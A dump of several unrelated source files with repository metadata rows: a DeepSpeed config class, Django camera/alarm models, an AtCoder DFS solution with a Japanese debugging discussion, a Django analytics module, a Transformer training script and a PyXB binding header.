        self.optimizer_params = get_optimizer_params(param_dict)
        self.optimizer_legacy_fusion = get_optimizer_legacy_fusion(param_dict)
        self.zero_allow_untested_optimizer = get_zero_allow_untested_optimizer(
            param_dict)
        self.scheduler_name = get_scheduler_name(param_dict)
        self.scheduler_params = get_scheduler_params(param_dict)
        self.wall_clock_breakdown = get_wall_clock_breakdown(param_dict)
        self.memory_breakdown = get_memory_breakdown(param_dict)
        self.tensorboard_enabled = get_tensorboard_enabled(param_dict)
        self.tensorboard_output_path = get_tensorboard_output_path(param_dict)
        self.tensorboard_job_name = get_tensorboard_job_name(param_dict)
        self.sparse_attention = get_sparse_attention(param_dict)
    def _batch_assertion(self):
        """Validate the three batch parameters and their product invariant:
        train_batch == micro_batch * grad_acc * world_size."""
        train_batch = self.train_batch_size
        micro_batch = self.train_micro_batch_size_per_gpu
        grad_acc = self.gradient_accumulation_steps
        assert train_batch > 0, \
            f'Train batch size: {train_batch} has to be greater than 0'
        assert micro_batch > 0, \
            f'Micro batch size per gpu: {micro_batch} has to be greater than 0'
        assert grad_acc > 0, \
            f'Gradient accumulation steps: {grad_acc} has to be greater than 0'
        assert train_batch == micro_batch * grad_acc * self.world_size, \
            (f'Check batch related parameters. train_batch_size is not equal'
             ' to micro_batch_per_gpu * gradient_acc_step * world_size'
             f'{train_batch} != {micro_batch} * {grad_acc} * {self.world_size}')
    def _set_batch_related_parameters(self):
        """Derive whichever of train_batch_size / micro_batch_per_gpu /
        gradient_accumulation_steps were left unset, from the ones given."""
        train_batch = self.train_batch_size
        micro_batch = self.train_micro_batch_size_per_gpu
        grad_acc = self.gradient_accumulation_steps
        #all values are provided nothing needs to be set
        if train_batch is not None and \
            micro_batch is not None and \
            grad_acc is not None:
            return
        #gradient_accumulation_steps needs to be set
        elif train_batch is not None and \
            micro_batch is not None:
            grad_acc = train_batch // micro_batch
            grad_acc //= self.world_size
            self.gradient_accumulation_steps = grad_acc
        #micro_batch_per_gpu needs to be set
        elif train_batch is not None and \
            grad_acc is not None:
            micro_batch = train_batch // self.world_size
            micro_batch //= grad_acc
            self.train_micro_batch_size_per_gpu = micro_batch
        #train_batch_size needs to be set
        elif micro_batch is not None and \
            grad_acc is not None:
            train_batch_size = micro_batch * grad_acc
            train_batch_size *= self.world_size
            self.train_batch_size = train_batch_size
        #only train_batch_size is given: derive the other two
        elif train_batch is not None:
            self.gradient_accumulation_steps = 1
            self.train_micro_batch_size_per_gpu = train_batch // self.world_size
        #only micro_batch_per_gpu is given: derive the other two
        elif micro_batch is not None:
            self.train_batch_size = micro_batch * self.world_size
            self.gradient_accumulation_steps = 1
        #either none of the three parameters are provided or just gradient_accumulation_step is provided
        else:
            # Explicit raise instead of `assert False`: asserts are stripped
            # under `python -O`, which would silently skip this validation.
            raise AssertionError(
                'Either train_batch_size or micro_batch_per_gpu needs to be provided')
        logger.info(
            f' After Train batch {self.train_batch_size} micro_batch {self.train_micro_batch_size_per_gpu} and grad_acc {self.gradient_accumulation_steps}'
        )
    def _configure_train_batch_size(self):
        """Fill in missing batch parameters, then check their consistency."""
        self._set_batch_related_parameters()
        self._batch_assertion()
    def _do_sanity_check(self):
        """Run hard error checks, then soft warning checks."""
        self._do_error_check()
        self._do_warning_check()
    def print(self, name):
        """Log every config attribute (sorted) plus the raw JSON under *name*."""
        logger.info('{}:'.format(name))
        for arg in sorted(vars(self)):
            if arg != '_param_dict':
                dots = '.' * (29 - len(arg))
                logger.info('  {} {} {}'.format(arg, dots, getattr(self, arg)))
        logger.info('  json = {}'.format(
            json.dumps(self._param_dict,
                       sort_keys=True,
                       indent=4,
                       separators=(',',
                                   ':'))))
    def _do_error_check(self):
        """Raise on configurations DeepSpeed cannot run with."""
        if self.zero_enabled:
            assert self.fp16_enabled, "DeepSpeedConfig: ZeRO is only supported if fp16 is enabled"
            assert self.zero_optimization_stage <= MAX_STAGE_ZERO_OPTIMIZATION, "DeepSpeedConfig: Maximum supported ZeRO stage is {}".format(MAX_STAGE_ZERO_OPTIMIZATION)
        assert self.train_micro_batch_size_per_gpu, "DeepSpeedConfig: {} is not defined".format(TRAIN_MICRO_BATCH_SIZE_PER_GPU)
        assert self.gradient_accumulation_steps, 'DeepSpeedConfig: {} is not defined'.format(
            GRADIENT_ACCUMULATION_STEPS)
    def _do_warning_check(self):
        """Log warnings for legal-but-suspicious settings."""
        fp16_enabled = self.fp16_enabled or self.zero_enabled
        # Tensor cores want the vocabulary padded to a multiple of the align size.
        vocabulary_size = self._param_dict.get(VOCABULARY_SIZE, VOCABULARY_SIZE_DEFAULT)
        if vocabulary_size and vocabulary_size % TENSOR_CORE_ALIGN_SIZE != 0:
            logger.warning(
                "DeepSpeedConfig: vocabulary size {} is not aligned to {}, may import tensor core utilization."
                .format(vocabulary_size,
                        TENSOR_CORE_ALIGN_SIZE))
        if self.optimizer_params is not None and \
            MAX_GRAD_NORM in self.optimizer_params.keys() and \
                self.optimizer_params[MAX_GRAD_NORM] > 0:
            if fp16_enabled:
                logger.warning(
                    'DeepSpeedConfig: In FP16 mode, DeepSpeed will pass {}:{} to FP16 wrapper'
                    .format(MAX_GRAD_NORM,
                            self.optimizer_params[MAX_GRAD_NORM]))
            else:
                logger.warning(
                    'DeepSpeedConfig: In FP32 mode, DeepSpeed does not permit MAX_GRAD_NORM ({}) > 0, setting to zero'
                    .format(self.optimizer_params[MAX_GRAD_NORM]))
                self.optimizer_params[MAX_GRAD_NORM] = 0.0
| [
"noreply@github.com"
] | tanghl1994.noreply@github.com |
4f8338dcfaaea8812c3f208254835374ac488f08 | 0de12c35f8a187b40ae7da824d0fe5dd608f6a17 | /Equipment/models.py | 889c705bf7b958771b246e119e4697e5044aaa0f | [] | no_license | AKoushikReddy/Django-WebApplication-2 | 3a59acb7639c630e7ea851616ad1427b69e3f44b | 079155622c3d41ba1faa63b92213d7f7a4a9eeb2 | refs/heads/master | 2020-04-08T02:06:33.510495 | 2018-11-24T10:13:06 | 2018-11-24T10:13:06 | 158,922,817 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 885 | py | from django.db import models
from accounts.models import UserHouse
# Create your models here.
class Camera(models.Model):
    """A surveillance camera installed at (and owned by) one UserHouse."""
    # Explicit integer primary key (disables Django's automatic `id` field).
    id = models.IntegerField(primary_key=True)
    # Deleting the house cascades to its cameras.
    house = models.ForeignKey(UserHouse, on_delete=models.CASCADE)
    # Installation/working state. NOTE(review): max_length on a TextField is
    # only enforced in forms, not at the database level.
    condition = models.TextField(max_length=30, default='Not Installed')
    cammodel = models.CharField(max_length=10, default='IP Camera')
    def __str__(self):
        """Human-readable label, e.g. "<house>'s camera 3:id"."""
        return str(self.house) + "\'s camera " + str(self.id) + ":id"
class SensorAlarm(models.Model):
    """A sensor-based alarm installed at (and owned by) one UserHouse."""
    # Explicit integer primary key (disables Django's automatic `id` field).
    id = models.IntegerField(primary_key=True)
    # Deleting the house cascades to its alarms.
    house = models.ForeignKey(UserHouse, on_delete=models.CASCADE)
    # Installation/working state. NOTE(review): max_length on a TextField is
    # only enforced in forms, not at the database level.
    condition = models.TextField(max_length=30, default='Not Installed')
    alarmtype = models.CharField(max_length=10, default='PIR Sensors')
    def __str__(self):
        """Human-readable label, e.g. "<house>'s sensor 3:id"."""
        return str(self.house) + "\'s sensor " + str(self.id) + ":id"
| [
"noreply@github.com"
] | AKoushikReddy.noreply@github.com |
c3a9262abc44ac5508726e238bdcacc3f8454599 | 24cee07743790afde5040c38ef95bb940451e2f6 | /acode/abc284/e/update.py | cbe323dede2e63602d87336c493cc58525a7c3eb | [] | no_license | tinaba96/coding | fe903fb8740d115cf5a7f4ff5af73c7d16b9bce1 | d999bf5620e52fabce4e564c73b9f186e493b070 | refs/heads/master | 2023-09-01T02:24:33.476364 | 2023-08-30T15:01:47 | 2023-08-30T15:01:47 | 227,594,153 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,006 | py | import sys
sys.setrecursionlimit(500005)
#sys.setrecursionlimit(10**9)
#import pypyjit # this is for solving slow issue for pypy when using recursion but python will not need this (test will fail but submit works)
#pypyjit.set_param('max_unroll_recursion=-1')
N, M = list(map(int, input().split()))
mp = [[] for n in range(N+1)]
for i in range(M):
u, v = list(map(int, input().split()))
mp[u].append(v)
mp[v].append(u)
al = set()
cnt = 0
def dfs(p, e):
    """Count simple paths that extend path *p*, whose last vertex is *e*.

    *p* is the path encoded as comma-joined vertex labels (the initial call
    passes a single label, e.g. '1'). Two fixes over the original:
    - Vertices are delimited, so '1'+'23' can no longer collide with
      '12'+'3' (the concatenation ambiguity that skipped/merged paths).
    - In a simple graph every DFS path is distinct, so a plain counter
      replaces the memory-hungry set of path strings.
    """
    global cnt
    cnt += 1
    if cnt > 10**6:
        # The answer is capped at 10**6; stop as soon as we exceed it.
        print(10**6)
        exit()
    for n in mp[e]:
        token = ',' + str(n) + ','
        if token in ',' + p + ',':
            continue  # vertex n is already on the current path
        dfs(p + ',' + str(n), n)
    return
# Explore every simple path starting from vertex 1, then print the count.
dfs('1', 1)
print(cnt)
# WA: 全探索ができていない?
# TLE: len(al)やstr(n) in p に時間を要している? それともpythonの再帰だから? -> len(al) is O(1), str(n) in p is almopst O(NlogN) (this is the cause of TLE)
# len(al) can costs almost 10**6 specially at the end. -> this is wrong see below
# str(n) in p costs O(len(p)) which is O(N) at maximum -> almost O(NlogN)
'''
ask question in LINE
ME
ABC284Eなのですが、このように実装して提出した結果、AC: 21 WA: 9 TLE: 3というような結果になってしまいました。
TLEになる原因は、len(al)やstr(n) in p だと思うのですが、WAになる原因が分かりません。パスを文字列として、setに格納していく実装なのですが、WAの原因分かる方いらっしゃいますでしょうか。
answer1
p = '1'+'2'のときに12も行ったことになるとか?
path graph (一直線のグラフ)だとalに入る文字数がO(n^2)になって大変なことになりませんか
ME
そうですね!確かにこれだと0-9までの頂点しか機能しないですね!
ありがとうございます!
ans2
dfs(p+‘$’+str(n), n)
とかってしたらこの問題は解決できそうですね
ME
al.add(p)のpの(文字列の)長さlen(p)がO(n^2)なるということでしょうか。(for ans1)
確かに頭に文字列をつければ、探索する際も特定できますね!ありがとうございます!(for ans2)
ans1
alに入っている文字列の合計の長さです
単純グラフなので、DFSする限りでは毎回必ず違ったpになるので、個数だけ管理しておけばよいです
ME
確かにそうなりますね!気づきませんでした、、
これは単純にメモリ制限的に引っかかるという考え方で良いのでしょうか。
勉強になります!
ans1
基本的にそのはず…賢い言語実装だとメモリ節約してくれるのもあった気がしますが
ME
ありがとうございます!
ちなみに、dfsの部分はO(N+M)だと思っているのですが、
それに加え、len(al)やstr(n) in p の部分がさらにO(N)かかり、全体的にO(N(N+M))ではないかと考えたのですが、考え方はあっているのでしょうか。
len(al)やstr(n) in pの部分はそれぞれalとpの長さの分計算コストかかると思っているのですが、それぞれの長さがNくらいになるのは最後の方だけだと思います。全体としてO(N(N+M)と考えて良いのでしょうか。
len(al)やstr(n) in pの部分は、ならし計算量でもO(1)にならないと思うので、ならし計算量でO(1)にならなければ、O(N)と考えれば良いのでしょうか?
asn3
(余計なお世話かもしれませんがnを文字列で表した時の長さはO(log n)なのでalに含まれる文字列の長さの合計にもlogが付くと思います)
ans4
len は定数時間じゃないですか?
ME
ありがとうございます!
これは、グラフの分岐があるためlogがつくということでしょうか。
一直線のグラフなどの最悪ケースでO(n^2)になるという理解で良いでしょうか? (for ans3)
pythonは長さを別で用意していて、len()はO(1)のようでした。
ご指摘ありがとうございます!(for ans4)
ans3
nを文字列で表そうとすると、その桁数分の文字が必要で、その桁数というのがO(log n)なので文字列の長さ、つまり文字の個数の合計にlogが付くという話です
例えば1や3は1桁なので1文字で良いですが、100000は6桁なので6文字必要です
ans5
その問題、再帰関数を用いたdfsが一般的だと思うのですが、スタックを用いたdfs で実装するのは厳しそうですかね?
ME
そういうことですね!理解できました。ありがとうございます!(for ans3)
となると、TLEの原因はstr(n) in pの部分でpの長さ分コストがかかるという理解で良いのでしょうか。pは最大N回文字列が足され、それぞれ足される文字列の長さがO(logN)と考えるとpの長さは O (NlogN)という感じでしょうか。
実装まではしていないのですが、pythonの再帰処理が苦手であることを考えるとスタックによる実装の方が早くなるとは思います。
ただこれがTLEの原因なのでしょうか。それとも上記のstr(n) in pがボトルネックになっているのでしょうか。(for ans5)
ans3
正しいと思います
TLEの原因がこれで、もしTLが無限であった場合今度はalのメモリが原因でMLEになると思います
ans4
+str(n) も PyPy だと遅そうなのと、なんか "123" か 1 → 2 → 3 なのか 1 → 23 なのかの曖昧性があって壊れませんか?
後者が WA になってそうで、例えば
1 → 23 → 2 のときに、2 が踏めないと判断されそうです
あ、既に指摘されてましたごめんなさい
ME
ありがとうございます!非常に納得がいき、勉強になりました!(for ans3)
いえいえ!ありがとうございます!
具体例も非常に勉強になりました!(for ans4)
'''
| [
"tinaba178.96@gmail.com"
] | tinaba178.96@gmail.com |
ac3a3c48593301707e1581d20e629c1345302ee1 | a3d9884beae30f62ef1247e1ef09bfecc8f79eea | /gna/api.py | 89f33df7eaadd6bee238992639a810d4a71d308a | [] | no_license | sean2009/gm_web_analyze | f0f107d08987124edd3e909b96012b89728e03f0 | 470900c30b4bd61c959ace5a1b76164a837e9b58 | refs/heads/master | 2016-09-06T17:05:01.939995 | 2014-09-28T07:32:18 | 2014-09-28T07:32:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,126 | py | # -*- coding: utf-8 -*-
from django.conf import settings
import datetime
from gna.common import (
get_retention_cache_key,
get_month_cache_key,
)
from gna.gna_normal.models import (
Player,
DailyAccessLog,
PaymentInfo,
)
from gna.cache import (
daily_cache,
simple_cache,
delta_cache,
daily_flag_cache,
)
def _get_month_cache(db, key, date):
    """Fetch the cached monthly value for *key* at *date*; None when absent."""
    cached = simple_cache().get(db, get_month_cache_key(key, date))
    return cached['value'] if cached else None
def _get_date_str(date):
if type(date)==datetime.date or type(date)==datetime.datetime:
return date.strftime('%Y-%m-%d')
return date
def _get_str_by_int(value):
if value != None:
return str(int(float(value)))
else:
return None
def _get_str_by_float(value):
if value != None:
return '%.1f' % (float(value))
else:
return None
def _get_percent_by_float(value):
if value != None:
return '%.1f%%' % (float(value)*100.0)
else:
return None
# GNA Daily
class GNAObject(object):
    """One day's (or one month's) GNA metrics for a single db.

    Raw metric attributes default to None at class level; get_str() derives
    the matching *_str display fields from them.
    """
    income = None
    dau = None
    arpu = None
    arppu = None
    pay_user = None
    pay_ratio = None
    first_pay_user = None
    first_pay_ratio = None
    register_user = None

    def __init__(self, db, date):
        self.db = db
        self.date = date

    def get_str(self):
        """Populate the *_str display fields from the raw metric values."""
        self.date_str = _get_date_str(self.date)
        # Each metric pairs with its formatter; attribute '<name>_str'
        # receives the formatted value (formatters map None to None).
        for name, fmt in (
                ('income', _get_str_by_int),
                ('dau', _get_str_by_int),
                ('arpu', _get_str_by_float),
                ('arppu', _get_str_by_float),
                ('pay_user', _get_str_by_int),
                ('pay_ratio', _get_percent_by_float),
                ('first_pay_user', _get_str_by_int),
                ('first_pay_ratio', _get_percent_by_float),
                ('register_user', _get_str_by_int),
        ):
            setattr(self, name + '_str', fmt(getattr(self, name)))
def get_gna_objs_list(db, from_date, to_date):
    """Build one GNAObject per day in [from_date, to_date], newest first.

    Each daily-cache metric is loaded once for the whole range and scattered
    onto the matching day's object; days without cached data keep None.
    """
    # Cache keys equal GNAObject attribute names, so a single loop replaces
    # the nine copy-pasted load/scatter loops of the original.
    metric_keys = (
        'income', 'dau', 'arpu', 'arppu', 'pay_user', 'pay_ratio',
        'first_pay_user', 'first_pay_ratio', 'register_user',
    )
    objs = []
    obj_dict = {}
    for i in range((to_date - from_date).days + 1):
        date = from_date + datetime.timedelta(days=i)
        obj = GNAObject(db, date)
        obj_dict[date] = obj
        objs.append(obj)
    objs.reverse()
    for key in metric_keys:
        for data in daily_cache().get_by_date_range(db, key, from_date, to_date):
            setattr(obj_dict[data['date']], key, data['value'])
    for obj in objs:
        obj.get_str()
    return objs
# GNA Month
def get_gna_month_obj(db, date):
    """Load the cached monthly GNA metrics for *date* into one GNAObject.

    Cache keys equal GNAObject attribute names, so a single loop replaces
    the nine copy-pasted assignments. A missing cache entry still raises
    TypeError via float(None), matching the original behavior.
    """
    obj = GNAObject(db, date)
    for key in ('income', 'dau', 'arpu', 'arppu', 'pay_ratio', 'pay_user',
                'first_pay_user', 'first_pay_ratio', 'register_user'):
        setattr(obj, key, float(_get_month_cache(db, key, date)))
    obj.get_str()
    return obj
# Retention Daily
class RetentionObject(object):
    """Per-day retention ratios (as display strings) for one date.

    retention_ratioN_str holds the N-day retention ratio string; attributes
    stay None until filled in by the list-builder functions below.
    """
    retention_ratio1_str = None
    retention_ratio2_str = None
    retention_ratio3_str = None
    retention_ratio4_str = None
    retention_ratio5_str = None
    retention_ratio6_str = None
    retention_ratio7_str = None
    retention_ratio14_str = None
    retention_ratio30_str = None
    retention_ratio60_str = None
    retention_ratio90_str = None
    def __init__(self, db, date):
        self.db = db
        self.date = date
        self.date_str = _get_date_str(self.date)
def get_retention_ratio_daily_objs_list(db, from_date, to_date):
    """Build one RetentionObject per day in [from_date, to_date], newest
    first, filling retention_ratioN_str from the daily cache for every N
    in settings.GNA_RETENTION_DAYS_LIST."""
    dates = [from_date + datetime.timedelta(days=offset)
             for offset in range((to_date - from_date).days + 1)]
    obj_by_date = {day: RetentionObject(db, day) for day in dates}
    for days in settings.GNA_RETENTION_DAYS_LIST:
        cache_key = get_retention_cache_key('retention_ratio', days)
        for row in daily_cache().get_by_date_range(db, cache_key, from_date, to_date):
            setattr(obj_by_date[row['date']],
                    'retention_ratio%d_str' % days,
                    row['value'])
    # Newest date first, matching the display order.
    return [obj_by_date[day] for day in reversed(dates)]
def get_retention_ratio_daily_objs_list_2(db, from_date, to_date):
    """Like get_retention_ratio_daily_objs_list, but each N-day ratio is
    stored in the cache under base_date + N days, so the query window is
    shifted forward by N and each row is re-anchored onto its base date."""
    dates = [from_date + datetime.timedelta(days=offset)
             for offset in range((to_date - from_date).days + 1)]
    obj_by_date = {day: RetentionObject(db, day) for day in dates}
    for days in settings.GNA_RETENTION_DAYS_LIST:
        shift = datetime.timedelta(days=days)
        cache_key = get_retention_cache_key('retention_ratio', days)
        rows = daily_cache().get_by_date_range(
            db, cache_key, from_date + shift, to_date + shift)
        for row in rows:
            setattr(obj_by_date[row['date'] - shift],
                    'retention_ratio%d_str' % days,
                    row['value'])
    # Newest date first, matching the display order.
    return [obj_by_date[day] for day in reversed(dates)]
| [
"peng.xiao@gumichina.com"
] | peng.xiao@gumichina.com |
c661730f7f3d3c2b70f65f28e85c421558db8d73 | 87a8f7aa17ca00a09b07db179cfc3db5ac114861 | /train_cross.py | d4146ec5762316ee5cbd05c12bed1ae2b989d533 | [
"MIT"
] | permissive | boji123/attention-is-all-you-need-pytorch | 711b57a076aa14555e7be6678a7bd71eb6563079 | fec848eacab494fd181d894d81efe8f8fac83046 | refs/heads/master | 2020-03-27T10:10:29.290897 | 2018-08-28T06:33:01 | 2018-08-28T06:33:01 | 141,121,040 | 0 | 0 | MIT | 2018-07-16T10:02:51 | 2018-07-16T10:02:50 | null | UTF-8 | Python | false | false | 9,879 | py | '''
This script handling the training process.
'''
import argparse
import math
import time
import sys
from tqdm import tqdm
import torch
import torch.nn as nn
import torch.optim as optim
import transformer.Constants as Constants
from transformer.Models import Transformer
from transformer.Optim import ScheduledOptim
from DataLoader import DataLoader
from DataLoader import Cross_Validation_Datahandler
from torch.nn import DataParallel
def get_performance(crit, pred, gold, smoothing=False, num_class=None):
    """Compute the loss and the number of correctly predicted non-PAD tokens.

    Label smoothing is not implemented: requesting it raises
    NotImplementedError (after asserting num_class, as before), now *before*
    mutating `gold` — the old code rewrote `gold` and then raised anyway.
    """
    # TODO: Add smoothing
    if smoothing:
        assert bool(num_class)
        raise NotImplementedError
    loss = crit(pred, gold.contiguous().view(-1))
    pred = pred.max(1)[1]
    gold = gold.contiguous().view(-1)
    n_correct = pred.data.eq(gold.data)
    # Count matches only at positions that are not padding.
    n_correct = n_correct.masked_select(gold.ne(Constants.PAD).data).sum()
    return loss, n_correct
def train_epoch(model, training_data, crit, optimizer):
    """Run one training epoch; return (loss per word, accuracy per word).

    NOTE(review): `loss.data[0]` and the absence of a no-grad context are
    pre-0.4 PyTorch idioms — this code presumably targets that era.
    """
    model.train()
    total_loss = 0
    n_total_words = 0
    n_total_correct = 0
    for batch in tqdm(
            training_data, mininterval=2,
            desc=' - (Training) ', leave=False):
        # prepare data
        src, tgt = batch
        gold = tgt[0][:, 1:]
        # forward
        optimizer.zero_grad()
        pred = model(src, tgt)
        # backward
        loss, n_correct = get_performance(crit, pred, gold)
        loss.backward()
        # update parameters (update_learning_rate applies the warmup schedule
        # of ScheduledOptim — see the import at the top of the file)
        optimizer.step()
        optimizer.update_learning_rate()
        # note keeping: count only non-PAD target tokens
        n_words = gold.data.ne(Constants.PAD).sum()
        n_total_words += n_words
        n_total_correct += n_correct
        total_loss += loss.data[0]
    return total_loss/n_total_words, n_total_correct/n_total_words
def eval_epoch(model, validation_data, crit):
    """Run one validation epoch; return (loss per word, accuracy per word).

    NOTE(review): no torch.no_grad()/volatile guard here — on modern PyTorch
    this would track gradients during evaluation; presumably written for
    pre-0.4 PyTorch (see `loss.data[0]` below).
    """
    model.eval()
    total_loss = 0
    n_total_words = 0
    n_total_correct = 0
    for batch in tqdm(
            validation_data, mininterval=2,
            desc=' - (Validation) ', leave=False):
        # prepare data
        src, tgt = batch
        gold = tgt[0][:, 1:]
        # forward
        pred = model(src, tgt)
        loss, n_correct = get_performance(crit, pred, gold)
        # note keeping: count only non-PAD target tokens
        n_words = gold.data.ne(Constants.PAD).sum()
        n_total_words += n_words
        n_total_correct += n_correct
        total_loss += loss.data[0]
    return total_loss/n_total_words, n_total_correct/n_total_words
def train(model, datahandler, crit, optimizer, opt):
    """Full training driver: per-epoch train/validate, checkpoint, and log.

    opt.save_mode 'all' saves every epoch; 'best' overwrites a single
    checkpoint whenever validation accuracy reaches a new maximum.
    """
    log_train_file = None
    log_valid_file = None
    if opt.log:
        log_train_file = opt.log + '.train.log'
        log_valid_file = opt.log + '.valid.log'
        print('[Info] Training performance will be written to file: {} and {}'.format(
            log_train_file, log_valid_file))
        # Truncate both logs and write the CSV header once.
        with open(log_train_file, 'w') as log_tf, open(log_valid_file, 'w') as log_vf:
            log_tf.write('epoch,loss,ppl,accuracy\n')
            log_vf.write('epoch,loss,ppl,accuracy\n')
    valid_accus = []
    for epoch_i in range(opt.epoch):
        print('[ Epoch', epoch_i, ']')
        # Cross-validation handler: each epoch gets its own train/valid split.
        training_data, validation_data = datahandler.load_data(epoch_i)
        start = time.time()
        train_loss, train_accu = train_epoch(model, training_data, crit, optimizer)
        # ppl is clamped via min(loss, 100) to avoid math.exp overflow.
        print(' - (Training) ppl: {ppl: 8.5f}, accuracy: {accu:3.3f} %, '\
            'elapse: {elapse:3.3f} min'.format(
                ppl=math.exp(min(train_loss, 100)), accu=100*train_accu,
                elapse=(time.time()-start)/60))
        start = time.time()
        valid_loss, valid_accu = eval_epoch(model, validation_data, crit)
        print(' - (Validation) ppl: {ppl: 8.5f}, accuracy: {accu:3.3f} %, '\
            'elapse: {elapse:3.3f} min'.format(
                ppl=math.exp(min(valid_loss, 100)), accu=100*valid_accu,
                elapse=(time.time()-start)/60))
        valid_accus += [valid_accu]
        model_state_dict = model.state_dict()
        checkpoint = {
            'model': model_state_dict,
            'settings': opt,
            'epoch': epoch_i}
        if opt.save_model:
            if opt.save_mode == 'all':
                model_name = opt.save_model + '_accu_{accu:3.3f}.chkpt'.format(accu=100*valid_accu)
                torch.save(checkpoint, model_name)
            elif opt.save_mode == 'best':
                model_name = opt.save_model + '.chkpt'
                if valid_accu >= max(valid_accus):
                    torch.save(checkpoint, model_name)
                    print(' - [Info] The checkpoint file has been updated.')
        if log_train_file and log_valid_file:
            # Append this epoch's metrics to the CSV logs.
            with open(log_train_file, 'a') as log_tf, open(log_valid_file, 'a') as log_vf:
                log_tf.write('{epoch},{loss: 8.5f},{ppl: 8.5f},{accu:3.3f}\n'.format(
                    epoch=epoch_i, loss=train_loss,
                    ppl=math.exp(min(train_loss, 100)), accu=100*train_accu))
                log_vf.write('{epoch},{loss: 8.5f},{ppl: 8.5f},{accu:3.3f}\n'.format(
                    epoch=epoch_i, loss=valid_loss,
                    ppl=math.exp(min(valid_loss, 100)), accu=100*valid_accu))
def main():
''' Main function '''
parser = argparse.ArgumentParser()
parser.add_argument('-data', required=True)
parser.add_argument('-gpu_device_ids', type=str, default='0')
parser.add_argument('-init_model', type=str, default=None)
parser.add_argument('-use_pretrained_encoder', action='store_true')
parser.add_argument('-epoch', type=int, default=10)
parser.add_argument('-batch_size', type=int, default=32)
#parser.add_argument('-d_word_vec', type=int, default=512)
parser.add_argument('-d_model', type=int, default=512)
parser.add_argument('-d_inner_hid', type=int, default=1024)
parser.add_argument('-d_k', type=int, default=64)
parser.add_argument('-d_v', type=int, default=64)
parser.add_argument('-n_head', type=int, default=8)
parser.add_argument('-n_layers', type=int, default=6)
parser.add_argument('-n_warmup_steps', type=int, default=4000)
parser.add_argument('-dropout', type=float, default=0.1)
parser.add_argument('-embs_share_weight', action='store_true')
parser.add_argument('-proj_share_weight', action='store_true')
parser.add_argument('-log', default=None)
parser.add_argument('-save_model', default=None)
parser.add_argument('-save_mode', type=str, choices=['all', 'best'], default='best')
parser.add_argument('-no_cuda', action='store_true')
opt = parser.parse_args()
opt.cuda = not opt.no_cuda
opt.d_word_vec = opt.d_model
opt.gpu_device_ids = [ int(i) for i in opt.gpu_device_ids.split(',')]
#print(opt.gpu_device_ids)
#exit(0)
#========= Loading Dataset =========#
data = torch.load(opt.data)
data['data']={}
data['data']['src'] = data['train']['src'] + data['valid']['src']
data['data']['tgt'] = data['train']['tgt'] + data['valid']['tgt']
opt.src_vocab_size = len(data['dict']['src'])
opt.tgt_vocab_size = len(data['dict']['tgt'])
opt.max_token_seq_len = data['settings'].max_token_seq_len
corss_num_k = 10
datahandler = Cross_Validation_Datahandler(data, opt, corss_num_k)
#========= Preparing Model =========#
print(opt)
if opt.init_model:
checkpoint = torch.load(opt.init_model)
model_opt = checkpoint['settings']
transformer = Transformer(
model_opt.src_vocab_size,
model_opt.tgt_vocab_size,
model_opt.max_token_seq_len,
proj_share_weight=model_opt.proj_share_weight,
embs_share_weight=model_opt.embs_share_weight,
d_k=model_opt.d_k,
d_v=model_opt.d_v,
d_model=model_opt.d_model,
d_word_vec=model_opt.d_word_vec,
d_inner_hid=model_opt.d_inner_hid,
n_layers=model_opt.n_layers,
n_head=model_opt.n_head,
dropout=model_opt.dropout)
transformer.load_state_dict(checkpoint['model'])
init_epoch = checkpoint['epoch']
print('[Info] Trained model state loaded.')
sys.stdout.flush()
if opt.use_pretrained_encoder:
for param in transformer.encoder.parameters():
param.requires_grad = False
print('[Info] encoder parameter will keep constant during training')
else:
transformer = Transformer(
opt.src_vocab_size,
opt.tgt_vocab_size,
opt.max_token_seq_len,
proj_share_weight=opt.proj_share_weight,
embs_share_weight=opt.embs_share_weight,
d_k=opt.d_k,
d_v=opt.d_v,
d_model=opt.d_model,
d_word_vec=opt.d_word_vec,
d_inner_hid=opt.d_inner_hid,
n_layers=opt.n_layers,
n_head=opt.n_head,
dropout=opt.dropout)
#print(transformer)
optimizer = ScheduledOptim(
optim.Adam(
#transformer.get_trainable_parameters(),
filter(lambda p: p.requires_grad,transformer.get_trainable_parameters()),
betas=(0.9, 0.98), eps=1e-09),
opt.d_model, opt.n_warmup_steps)
def get_criterion(vocab_size):
''' With PAD token zero weight '''
weight = torch.ones(vocab_size)
weight[Constants.PAD] = 0
return nn.CrossEntropyLoss(weight, size_average=False)
crit = get_criterion(opt.tgt_vocab_size)
if opt.cuda:
transformer = transformer.cuda()
crit = crit.cuda()
train(transformer, datahandler, crit, optimizer, opt)
if __name__ == '__main__':
print('training start')
sys.stdout.flush()
main()
| [
"boji@aliyun.com"
] | boji@aliyun.com |
0ab7d42a20a3cab1ee17535c5ad991ea33d9fbaf | 51d4d53a03ff4aa2dea4b60991389ac95b3576bf | /ddexreader/ern312/_iso639a2.py | 326f6e5d08602f7bde02171d183e22510050716f | [
"MIT"
] | permissive | Trax-air/ddexreader | 05fda370d4a4dd251daa19a031c6dc4dc7a42f4b | 444811b3c0a4704691e8cd27ab3d9c580f23e177 | refs/heads/master | 2023-01-05T21:40:33.901586 | 2015-09-14T14:43:57 | 2015-09-14T14:43:57 | 38,633,547 | 28 | 15 | MIT | 2022-12-26T19:44:20 | 2015-07-06T17:08:40 | Python | UTF-8 | Python | false | false | 20,856 | py | # .\_iso639a2.py
# -*- coding: utf-8 -*-
# PyXB bindings for NM:72b0e0221aebdf4a98e2c5feefcc21990195dd91
# Generated 2015-08-12 15:54:17.335000 by PyXB version 1.2.4 using Python 2.7.0.final.0
# Namespace http://ddex.net/xml/20100121/iso639a2 [xmlns:iso639a2]
from __future__ import unicode_literals
import pyxb
import pyxb.binding
import pyxb.binding.saxer
import io
import pyxb.utils.utility
import pyxb.utils.domutils
import sys
import pyxb.utils.six as _six
# Unique identifier for bindings created at the same time
_GenerationUID = pyxb.utils.utility.UniqueIdentifier('urn:uuid:9d0dcd70-40f9-11e5-9eef-b870f477ffbe')
# Version of PyXB used to generate the bindings
_PyXBVersion = '1.2.4'
# Generated bindings are not compatible across PyXB versions
if pyxb.__version__ != _PyXBVersion:
raise pyxb.PyXBVersionError(_PyXBVersion)
# Import bindings for namespaces imported into schema
import pyxb.binding.datatypes
# NOTE: All namespace declarations are reserved within the binding
Namespace = pyxb.namespace.NamespaceForURI('http://ddex.net/xml/20100121/iso639a2', create_if_missing=True)
